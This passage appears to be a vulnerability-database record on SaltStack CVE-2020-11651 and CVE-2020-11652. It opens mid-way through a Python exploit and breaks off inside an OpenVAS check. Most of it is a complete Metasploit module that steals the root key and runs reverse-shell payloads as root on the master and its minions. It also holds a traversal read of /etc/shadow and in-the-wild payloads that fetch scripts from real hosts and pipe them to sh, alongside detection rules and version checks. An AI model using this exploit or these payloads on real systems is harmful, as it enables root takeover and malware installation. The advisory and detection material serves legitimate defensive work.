Hit ^C to abort.\") \ntime.sleep(2) \npwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid) \n \n \nif __name__ == '__main__': \nmain() \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/157560/saltstack30001-exec.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-17T09:39:05", "description": "", "cvss3": {}, "published": "2020-05-12T00:00:00", "type": "packetstorm", "title": "SaltStack Salt Master/Minion Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-12T00:00:00", "id": "PACKETSTORM:157678", "href": "https://packetstormsecurity.com/files/157678/SaltStack-Salt-Master-Minion-Unauthenticated-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::ZeroMQ \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::CmdStager::HTTP # HACK: This is a mixin of a mixin \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'SaltStack Salt Master/Minion Unauthenticated RCE', \n'Description' => %q{ \nThis module exploits unauthenticated access to the runner() and \n_send_pub() methods in the SaltStack Salt master's ZeroMQ request \nserver, for versions 2019.2.3 and earlier and 3000.1 and earlier, to \nexecute code as root on either the master or on select minions. \n \nVMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are \nknown to be affected by the Salt vulnerabilities. \n \nTested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as \nwell as Vulhub's Docker image. 
\n}, \n'Author' => [ \n'F-Secure', # Discovery \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-11651'], # Auth bypass (used by this module) \n['CVE', '2020-11652'], # Authed directory traversals (not used here) \n['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'], \n['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'], \n['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py'] \n], \n'DisclosureDate' => '2020-04-30', # F-Secure advisory \n'License' => MSF_LICENSE, \n'Platform' => ['python', 'unix'], \n'Arch' => [ARCH_PYTHON, ARCH_CMD], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Master (Python payload)', \n'Description' => 'Executing Python payload on the master', \n'Type' => :python, \n'DefaultOptions' => { \n'PAYLOAD' => 'python/meterpreter/reverse_https' \n} \n], \n[ \n'Master (Unix command)', \n'Description' => 'Executing Unix command on the master', \n'Type' => :unix_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n], \n[ \n'Minions (Python payload)', \n'Description' => 'Executing Python payload on the minions', \n'Type' => :python, \n'DefaultOptions' => { \n'PAYLOAD' => 'python/meterpreter/reverse_https' \n} \n], \n[ \n'Minions (Unix command)', \n'Description' => 'Executing Unix command on the minions', \n'Type' => :unix_command, \n'DefaultOptions' => { \n# cmd/unix/reverse_python_ssl crashes in this target \n'PAYLOAD' => 'cmd/unix/reverse_python' \n} \n] \n], \n'DefaultTarget' => 0, # Defaults to master for safety \n'DefaultOptions' => { \n'CheckModule' => 'auxiliary/gather/saltstack_salt_root_key' \n}, \n'Notes' => { \n'Stability' => [SERVICE_RESOURCE_LOSS], # May hang up the service \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n 
\nregister_options([ \nOpt::RPORT(4506), \nOptRegexp.new('MINIONS', [true, 'PCRE regex of minions to target', /.*/]) \n]) \n \nregister_advanced_options([ \nOptInt.new('WfsDelay', [true, 'Seconds to wait for *all* sessions', 10]) \n]) \n \n# XXX: https://github.com/rapid7/metasploit-framework/issues/12963 \nimport_target_defaults \nend \n \n# NOTE: check is provided by auxiliary/gather/saltstack_salt_root_key \n \ndef exploit \n# check.reason is from auxiliary/gather/saltstack_salt_root_key \nif target.name.start_with?('Master') \nunless (root_key = check.reason) \nfail_with(Failure::BadConfig, \n\"#{target['Description']} requires a root key\") \nend \n \nprint_good(\"Successfully obtained root key: #{root_key}\") \nend \n \n# These are from Msf::Exploit::Remote::ZeroMQ \nzmq_connect \nzmq_negotiate \n \nprint_status(\"#{target['Description']}: #{datastore['PAYLOAD']}\") \n \ncase target.name \nwhen /^Master/ \nyeet_runner(root_key) \nwhen /^Minions/ \nyeet_send_pub \nend \n \n# HACK: Hijack WfsDelay to wait for _all_ sessions, not just the first one \nsleep(wfs_delay) \nrescue EOFError, Rex::ConnectionError => e \nprint_error(\"#{e.class}: #{e.message}\") \nensure \n# This is from Msf::Exploit::Remote::ZeroMQ \nzmq_disconnect \nend \n \ndef yeet_runner(root_key) \nprint_status(\"Yeeting runner() at #{peer}\") \n \n# https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L1898-L1951 \n# https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L1898-L1951 \nrunner = { \n'cmd' => 'runner', \n# https://docs.saltstack.com/en/master/ref/runners/all/salt.runners.salt.html#salt.runners.salt.cmd \n'fun' => 'salt.cmd', \n'kwarg' => { \n'hide_output' => true, \n'ignore_retcode' => true, \n'output_loglevel' => 'quiet' \n}, \n'user' => 'root', # This is NOT the Unix user! \n'key' => root_key # No JID needed, only the root key! 
\n} \n \ncase target['Type'] \nwhen :python \nvprint_status(\"Executing Python code: #{payload.encoded}\") \n \n# https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code \nrunner['kwarg'].merge!( \n'fun' => 'cmd.exec_code', \n'lang' => payload.arch.first, \n'code' => payload.encoded \n) \nwhen :unix_command \n# HTTPS doesn't appear to be supported by the server :( \nprint_status(\"Serving intermediate stager over HTTP: #{start_service}\") \n \nvprint_status(\"Executing Unix command: #{payload.encoded}\") \n \n# https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.script \nrunner['kwarg'].merge!( \n# cmd.run doesn't work due to a missing argument error, so we use this \n'fun' => 'cmd.script', \n'source' => get_uri, \n'stdin' => payload.encoded \n) \nend \n \nvprint_status(\"Unserialized clear load: #{runner}\") \nzmq_send_message(serialize_clear_load(runner)) \n \nunless (res = sock.get_once) \nfail_with(Failure::Unknown, 'Did not receive runner() response') \nend \n \nvprint_good(\"Received runner() response: #{res.inspect}\") \nend \n \ndef yeet_send_pub \nprint_status(\"Yeeting _send_pub() at #{peer}\") \n \n# NOTE: A unique JID (job ID) is needed for every published job \njid = generate_jid \n \n# https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L2043-L2151 \n# https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L2043-L2151 \nsend_pub = { \n'cmd' => '_send_pub', \n'kwargs' => { \n'bg' => true, \n'hide_output' => true, \n'ignore_retcode' => true, \n'output_loglevel' => 'quiet', \n'show_jid' => false, \n'show_timeout' => false \n}, \n'user' => 'root', # This is NOT the Unix user! 
\n'tgt' => datastore['MINIONS'].source, \n'tgt_type' => 'pcre', \n'jid' => jid \n} \n \ncase target['Type'] \nwhen :python \nvprint_status(\"Executing Python code: #{payload.encoded}\") \n \n# https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code \nsend_pub.merge!( \n'fun' => 'cmd.exec_code', \n'arg' => [payload.arch.first, payload.encoded] \n) \nwhen :unix_command \nvprint_status(\"Executing Unix command: #{payload.encoded}\") \n \n# https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.run \nsend_pub.merge!( \n'fun' => 'cmd.run', \n'arg' => [payload.encoded] \n) \nend \n \nvprint_status(\"Unserialized clear load: #{send_pub}\") \nzmq_send_message(serialize_clear_load(send_pub)) \n \nunless (res = sock.get_once) \nfail_with(Failure::Unknown, 'Did not receive _send_pub() response') \nend \n \nvprint_good(\"Received _send_pub() response: #{res.inspect}\") \n \n# NOTE: This path will likely change between platforms and distros \nregister_file_for_cleanup(\"/var/cache/salt/minion/proc/#{jid}\") \nend \n \n# https://github.com/saltstack/salt/blob/v2019.2.3/salt/utils/jid.py \n# https://github.com/saltstack/salt/blob/v3000.1/salt/utils/jid.py \ndef generate_jid \nDateTime.now.new_offset.strftime('%Y%m%d%H%M%S%6N') \nend \n \n# HACK: Stub out the command stager used by Msf::Exploit::CmdStager::HTTP \ndef stager_instance \nnil \nend \n \n# HACK: Sub out the executable used by Msf::Exploit::CmdStager::HTTP \ndef exe \n# NOTE: The shebang line is necessary in this case! \n<<~SHELL \n#!/bin/sh \n/bin/sh \nSHELL \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/157678/saltstack_salt_unauth_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-01-19T17:12:59", "description": "An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. 
The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-30T00:00:00", "type": "attackerkb", "title": "CVE-2020-11652", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-08-28T00:00:00", "id": "AKB:52C0CBC0-02B2-4F9D-9C4B-5825DD7EF1AD", "href": "https://attackerkb.com/topics/gdqFyHOPSM/cve-2020-11652", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-10T16:43:16", "description": "An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. 
These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.\n\n \n**Recent assessments:** \n \n**kevthehermit** at May 01, 2020 8:19pm UTC reported:\n\n#### Overview\n\nFor Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.\n\nIf a salt-master has its ZeroMQ ports `4506` exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.\n\nThis requires multiple socket requests: one to read the key and then additional requests to create jobs.\n\n#### Proof Of Concept\n\nThis POC was tested on SaltStack 2019.2.0\n\nAs of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here \u2013 <https://github.com/kevthehermit/CVE-2020-11651>\n\nThe POC, and others that I am sure will appear shortly, has the following functionality\n\n * Read the root key \n\n * Read and Write files on the Salt Master \n\n * Construct a payload to gain full RCE as root on any connected Minion \n\n\nThis took several hours and is \u201ceasy\u201d with the available information and access to a test instance. Details on the discovery process can be found on our blog \u2013 <https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/>\n\n#### Mitigations:\n\nPatch to the latest versions and do not expose these ports to the external network.\n\n#### Detections\n\nExamine `/var/cache/salt/master/jobs/` on the salt master for a listing of all jobs. The `return.p` file in these dirs will contain a detailed description of the request and the response. 
This data is serialised.\n\nImmersive Labs have released a basic python script to parse all these job files \u2013 <https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/>\n \n \n # cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p\n \ufffd\ufffdreturn\ufffd\ufffdfun\ufffdwheel.file_roots.read\ufffdjid\ufffd20200501195107225222\ufffduser\ufffdUNKNOWN\ufffdfun_args\ufffd\ufffd../../../../etc/shadow\ufffd\ufffdsaltenv\ufffdbase\ufffd_stamp\ufffd2020-05-01T19:51:07.229260\ufffdreturn\ufffd\ufffd\ufffd /srv/salt/../../../../etc/shadow\ufffd\ufffdroot:!::0:::::\n bin:!::0:::::\n daemon:!::0:::::\n adm:!::0:::::\n lp:!::0:::::\n sync:!::0:::::\n shutdown:!::0:::::\n halt:!::0:::::\n mail:!::0:::::\n news:!::0:::::\n uucp:!::0:::::\n operator:!::0:::::\n man:!::0:::::\n postmaster:!::0:::::\n cron:!::0:::::\n ftp:!::0:::::\n sshd:!::0:::::\n at:!::0:::::\n squid:!::0:::::\n xfs:!::0:::::\n games:!::0:::::\n postgres:!::0:::::\n cyrus:!::0:::::\n vpopmail:!::0:::::\n ntp:!::0:::::\n smmsp:!::0:::::\n guest:!::0:::::\n nobody:!::0:::::\n salt:!:18164:0:99999:7:::\n \n \n\nSnort Rule:\n\n`alert tcp $EXTERNAL_NET any -> $HOME_NET 4506 (msg:\"Salt Stack root_key read attempt\"; content:\"_prep_auth_info\"; sid:1000000; rev:1;)`\n\nOn the wire it looks a bit like this so a stronger rule can be created \n`b'\\x82\\xa3enc\\xa5clear\\xa4load\\x81\\xa3cmd\\xaf_prep_auth_info'`\n\n#### In the wild\n\nThe following IPS have been observed sending malicious payloads. 
other IPS have been seen scanning.\n\n#### Payloads\n\nThe following Payloads have been observed\n\n * `(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh` \n\n * `import subprocess;subprocess.call(\\\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\\\",shell=True)` \n\n * `/bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='` \n\n * `(curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh` \n\n * `(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh` \n\n * `(curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh` \n\n * `/bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]` \n\n\n**hrbrmstr** at May 04, 2020 10:40am UTC reported:\n\n**z0r1nga** at April 30, 2020 11:57pm UTC reported:\n\n**wvu-r7** at May 04, 2020 7:36am UTC reported:\n\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-30T00:00:00", "type": "attackerkb", "title": "CVE-2020-11651", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-08-28T00:00:00", "id": "AKB:C964B102-C1A8-42E7-AE93-2D5FCBAD769C", "href": "https://attackerkb.com/topics/rEVl04z1p0/cve-2020-11651", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-05-12T15:13:45", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-05-01T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for salt (openSUSE-SU-2020:0564-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-11T00:00:00", "id": "OPENVAS:1361412562310853131", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310853131", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program 
is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.853131\");\n script_version(\"2020-05-11T07:05:27+0000\");\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-11 07:05:27 +0000 (Mon, 11 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-01 03:01:53 +0000 (Fri, 01 May 2020)\");\n script_name(\"openSUSE: Security Advisory for salt (openSUSE-SU-2020:0564-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.1\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2020:0564-1\");\n script_xref(name:\"URL\", value:\"http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'salt'\n package(s) announced via the openSUSE-SU-2020:0564-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for salt fixes the following issues:\n\n - Fix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\n This update was imported from the SUSE:SLE-15-SP1:Update 
update project.\n\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-564=1\");\n\n script_tag(name:\"affected\", value:\"'salt' package(s) on openSUSE Leap 15.1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"python2-salt\", rpm:\"python2-salt~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python3-salt\", rpm:\"python3-salt~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt\", rpm:\"salt~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-api\", rpm:\"salt-api~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-cloud\", rpm:\"salt-cloud~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-doc\", rpm:\"salt-doc~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-master\", rpm:\"salt-master~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-minion\", rpm:\"salt-minion~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"salt-proxy\", rpm:\"salt-proxy~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-ssh\", rpm:\"salt-ssh~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-standalone-formulas-configuration\", rpm:\"salt-standalone-formulas-configuration~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-syndic\", rpm:\"salt-syndic~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-bash-completion\", rpm:\"salt-bash-completion~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-fish-completion\", rpm:\"salt-fish-completion~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-zsh-completion\", rpm:\"salt-zsh-completion~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-03T15:55:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-05-31T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for salt (DLA-2223-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-31T00:00:00", "id": "OPENVAS:1361412562310892223", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892223", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: 
GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892223\");\n script_version(\"2020-05-31T03:00:08+0000\");\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-31 03:00:08 +0000 (Sun, 31 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-31 03:00:08 +0000 (Sun, 31 May 2020)\");\n script_name(\"Debian LTS: Security Advisory for salt (DLA-2223-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2020/05/msg00027.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-2223-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/959684\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'salt'\n package(s) 
announced via the DLA-2223-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several vulnerabilities were discovered in package salt, a\nconfiguration management and infrastructure automation software.\n\nCVE-2020-11651\n\nThe salt-master process ClearFuncs class does not properly validate\nmethod calls. This allows a remote user to access some methods\nwithout authentication. These methods can be used to retrieve user\ntokens from the salt master and/or run arbitrary commands on salt\nminions.\n\nCVE-2020-11652\n\nThe salt-master process ClearFuncs class allows access to some\nmethods that improperly sanitize paths. These methods allow\narbitrary directory access to authenticated users.\");\n\n script_tag(name:\"affected\", value:\"'salt' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n2014.1.13+ds-3+deb8u1.\n\nWe recommend that you upgrade your salt packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"salt-cloud\", ver:\"2014.1.13+ds-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-common\", ver:\"2014.1.13+ds-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-doc\", ver:\"2014.1.13+ds-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-master\", ver:\"2014.1.13+ds-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-minion\", ver:\"2014.1.13+ds-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-ssh\", ver:\"2014.1.13+ds-3+deb8u1\", 
rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-syndic\", ver:\"2014.1.13+ds-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T17:13:00", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-05-07T00:00:00", "type": "openvas", "title": "Debian: Security Advisory for salt (DSA-4676-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651", "CVE-2019-17361"], "modified": "2020-05-07T00:00:00", "id": "OPENVAS:1361412562310704676", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704676", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in 